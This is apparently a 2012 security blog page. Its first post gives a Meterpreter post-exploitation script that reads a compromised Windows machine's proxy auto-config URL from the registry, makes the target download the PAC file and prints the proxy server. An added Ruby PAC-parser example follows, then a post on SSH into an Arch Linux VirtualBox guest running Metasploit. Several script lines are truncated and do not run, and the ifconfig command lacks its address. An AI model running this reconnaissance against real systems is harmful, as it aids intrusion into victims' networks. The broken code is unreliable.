Sunday, 12 February 2012

Reading a proxy auto-config (PAC) file with Meterpreter

Since I am a web-security person (duh duh), please pardon me if you find this erroneous or useless.

The following Meterpreter script is an example of reading the proxy auto-config (PAC) file to find the proxy servers used by the compromised machine.

Tested on Windows XP only.

#This is just a concept of reading the PAC file from the compromised machine.
#You can take the stuff ahead from here :-)

#Variable initialization
session = client

if session.platform =~ /win32|win64/
  begin
    #Read the registry key and get the AutoConfigURL value
    open_key = session.sys.registry.open_key(HKEY_CURRENT_USER,
                 'Software\Microsoft\Windows\CurrentVersion\Internet Settings', KEY_READ)
    url = open_key.query_value('AutoConfigURL').data
    open_key.close
    print_status('Reading pac file.....')

    #Download the PAC file on the target with URLDownloadToFileW from urlmon.dll.
    #The remaining parameters follow the documented Win32 signature of that function.
    session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD',
      [['PBLOB', 'pCaller', 'in'], ['PWCHAR', 'szURL', 'in'], ['PWCHAR', 'szFileName', 'in'],
       ['DWORD', 'dwReserved', 'in'], ['PBLOB', 'lpfnCB', 'in']])
    #Assumption: the file is saved as proxy.pac in the working directory of the Meterpreter process.
    ret = session.railgun.urlmon.URLDownloadToFileW(nil, url, 'proxy.pac', 0, nil)
    raise 'download failed' unless ret['return'] == 0

    #Read the file from the target and search for the proxy server
    proxy_data = ''
    temp ='proxy.pac', 'rb')
    until temp.eof?
      proxy_data <<
    end
    temp.close
    match = proxy_data.match(/PROXY(.*)";/)
    raise 'no PROXY directive in pac file' if match.nil?
    proxy_host = match[1]
    print_status('The proxy server is:' + proxy_host)
  rescue ::Exception
    print_status('No pac file found')
  end
else
  print_status('Victim is not using Windows')
end

I have never coded in Ruby before, so any suggestions are welcome.
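As an added example (not code from the original post), here is a Ruby parser for the PAC file the script downloads. The script's /PROXY(.*)";/ regex greedily takes everything up to the last '";' on a line, so a rule such as "PROXY a:8080; PROXY b:3128; DIRECT" comes back as one string; this version walks every return statement and splits the ';'-separated directives instead. The sample PAC file and its hostnames are constructed.

```ruby
# Constructed sample PAC file (hypothetical hosts, not a real deployment).
SAMPLE_PAC = <<~PAC
  function FindProxyForURL(url, host) {
      // internal hosts go straight out
      if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
          return "DIRECT";
      if (shExpMatch(url, "https:*"))
          return "PROXY proxy1.corp.example:8080; PROXY proxy2.corp.example:3128; DIRECT";
      return "SOCKS5 socks.corp.example:1080";
  }
PAC

# Returns one {type:, host:, port:} hash per directive, in order of appearance.
# DIRECT carries no host/port; duplicate directives are dropped.
def pac_proxies(pac_text)
  seen = []
  # Every return "..." statement holds one or more ';'-separated directives.
  pac_text.scan(/return\s*"([^"]*)"/).flatten.each do |rule|
    rule.split(';').each do |directive|
      words = directive.strip.split(/\s+/)
      next if words.empty?
      type = words[0].upcase
      entry =
        if type == 'DIRECT'
          { type: 'DIRECT', host: nil, port: nil }
        elsif %w[PROXY HTTP HTTPS SOCKS SOCKS4 SOCKS5].include?(type) && words[1]
          host, port = words[1].split(':', 2)
          { type: type, host: host, port: port ? port.to_i : nil }
        end
      seen << entry if entry && !seen.include?(entry)
    end
  end
  seen
end

# Just the "host:port" strings of the real proxies, without DIRECT entries.
def pac_proxy_hosts(pac_text)
  pac_proxies(pac_text).reject { |p| p[:type] == 'DIRECT' }
                       .map { |p| "#{p[:host]}:#{p[:port]}" }
end

if __FILE__ == $0
  # The post's one-shot regex swallows the whole rule up to the last '";'.
  puts "naive regex: #{SAMPLE_PAC.match(/PROXY(.*)";/)[1].inspect}"
  pac_proxy_hosts(SAMPLE_PAC).each { |h| puts "proxy: #{h}" }
end
```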

Wednesday, 8 February 2012

SSH access to an Arch Linux guest in VirtualBox

For me, having the Metasploit Framework installed on a headless, lightweight operating system whose memory needs can be met with 50-80 MB of RAM was a reason to install Arch Linux.

This post shows quick and dirty steps to configure VirtualBox so that you can reach SSH on an Arch Linux guest that uses NAT.

Host: Windows
Guest: Arch Linux 64-bit
VirtualBox: 4.1.8

Power off your guest operating system. Go to your guest's settings and select Network. Set Adapter 1 to NAT and Adapter 2 to Host-Only Adapter. Refer to the following screenshots.

ipconfig on my Windows host shows the following configuration:

Power on your guest. Log in as root and set up the second interface with the following command:

ifconfig eth1 inet netmask up

From your host system, you will now be able to ping the guest and even SSH to it with an SSH client such as PuTTY.